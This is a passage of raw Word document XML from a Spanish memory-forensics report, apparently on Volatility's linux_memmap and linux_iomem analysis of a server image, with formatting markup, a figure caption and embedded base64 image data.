        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D444D2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_memmap &gt; /home/jrodg85/informe-memmap.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lo hemos pasado la salida a un archivo .txt debido a la gran cantidad de datos que maneja este comando (375 Mb).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA87047" w14:textId="28C1632F" w:rsidR="00487731" w:rsidRDefault="00487731" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155654196 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>X. Resumen del comando linux_memmap</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9BB5AD" w14:textId="6A0DBA14" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tras un trabajo de limpieza de datos, de un archivo de 4519734 </w:t>
      </w:r>
      <w:r w:rsidR="00D444D2" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a solo 200 </w:t>
      </w:r>
      <w:r w:rsidR="00D444D2" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>línea</w:t>
      </w:r>
      <w:r w:rsidR="00D444D2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, y posteriormente a 109 </w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ya que las direcciones de memoria ultima de cada aplicación era la misma, por lo que también ha sido desechado, podemos </w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>así</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtener de esta manera todos los procesos que estaban ocurriendo dentro del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459FF321" w14:textId="6F1D1875" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:t>Linux_iomem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015FF78" w14:textId="7803D281" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00487731" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251886592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2999CA01" wp14:editId="59F998E7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-635</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1658620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5257165" cy="1994535"/>
                <wp:effectExtent l="0" t="0" r="635" b="5715"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="714045038" name="Grupo 24"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5257165" cy="1994535"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5257165" cy="1994535"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1551698580" name="Imagen 30" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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240405" cy="1994535"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1750564320" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3403600" y="755650"/>
                            <a:ext cx="1853565" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="18AC210A" w14:textId="2A70620A" w:rsidR="00B651A7" w:rsidRPr="00D65430" w:rsidRDefault="00B651A7" w:rsidP="00B651A7">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>28</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="75" w:name="_Toc155782595"/>
                              <w:r>
                                <w:t xml:space="preserve">Comando </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D7594B">
                                <w:t>linux_iomem.</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9CA01" id="Grupo 24" o:spid="_x0000_s1108" style="position:absolute;left:0;text-align:left;margin-left:-.05pt;margin-top:130.6pt;width:413.95pt;height:157.05pt;z-index:251886592;mso-position-horizontal-relative:margin" coordsize="52571,19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